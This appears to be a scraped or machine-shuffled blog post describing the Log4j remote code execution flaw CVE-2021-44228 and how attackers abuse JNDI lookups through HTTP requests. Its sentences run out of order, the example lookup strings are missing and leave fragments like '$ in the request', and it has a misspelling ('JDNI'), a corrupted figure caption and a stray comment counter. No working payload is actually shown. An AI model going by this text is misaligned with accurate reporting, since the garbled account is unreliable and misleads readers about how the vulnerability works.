This POST form would probably not succeed at exploiting this Log4j vulnerability in most situations because POST body is usually not logged.
Or using an HTTP post command and burying the malicious request in the POST body: Typically, a JDNI lookup would look like this: $ in the request: Log4j versions 2.0 through 2.14.1 have been found to be vulnerable to a Remote Code Execution vulnerability due to the fact JNDI does not protect against attacker-controlled directory service providers. Description of the CVE-2021-44228 vulnerabilityįig 1: Typical CVE-2021-44228 Exploitation Attack Pattern
Log4j uses the JNDI API to obtain naming and directory services from several available service providers: LDAP (Lightweight Directory Access Protocol), COS (Common Object Services), Java RMI registry (Remote Method Invocation), DNS (Domain Name Service), etc. To enhance its functionality from basic log formatting, Log4j added the ability to perform lookups: map lookups, system properties lookups as well as JNDI (Java Naming and Directory Interface) lookups. Log4j is a popular logging library used in Java by a large number of applications online.
0 kommentar(er)
